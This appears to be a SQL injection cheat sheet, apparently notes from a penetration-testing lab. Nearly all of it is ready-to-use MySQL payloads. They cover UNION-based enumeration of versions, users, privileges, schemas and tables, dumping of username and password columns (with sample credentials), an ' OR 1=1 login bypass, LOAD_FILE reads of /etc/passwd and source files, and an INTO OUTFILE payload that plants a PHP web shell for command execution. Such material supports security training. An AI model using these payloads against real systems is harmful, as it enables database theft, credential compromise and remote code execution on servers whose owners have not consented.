SQL Injection

' order by 1-- -

' order by 2-- -

cn' UNION select 1,2,3-- -

cn' UNION select 1,2,3,4-- -

cn' UNION select 1,@@version,3,4-- -

cn' UNION select 1,user(),3,4-- -

cn' UNION SELECT 1, user, 3, 4 from mysql.user-- -

SELECT super_priv FROM mysql.user

cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user-- -

# Will display the privilege of user root / just change it
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -
= (Y means yes indicating superuser privileges)

# Will display all privilege of users
cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges-- -

# Will display the user and privilege for the databases / just change it
cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- -

# Will display the schema/databases
cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -

# Will display database
cn' UNION select 1,database(),2,3-- -

# Will display tables
cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -

# Will display column in table credentials
cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -

# Will display data of username and password from table credentials
cn' UNION select 1, username, password, 4 from dev.credentials-- -

# Will display tables
id=0 UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema = database()--

# Will display column
id=0 UNION SELECT 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_name = 'users'--

# Will display username and password
id=0 UNION SELECT 1,2,group_concat(username,':',password SEPARATOR '<br>') FROM users

Ex.
admin:p4ssword
martin:pa$$word
jim:work123

# Will display everything
' OR 1=1;--

Ex.
username: ' OR 1=1;--
password: ' OR 1=1;--

SELECT LOAD_FILE('/etc/passwd');

cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -

cn' UNION SELECT 1, LOAD_FILE("/var/www/html/search.php"), 3, 4-- -

cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -

cn' union select 1,'file written successfully!',3,4 into outfile '/var/www/html/proof.txt'-- -
> http://IP/proof.txt

cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -
> http://IP/shell.php?0=id (It will check the id of user)

(To know the server web directory just use "/usr/share/wordlists/seclists/Discovery/Web-Content/default-web-root-directory-linux.txt" or "default-web-root-directory-windows.txt")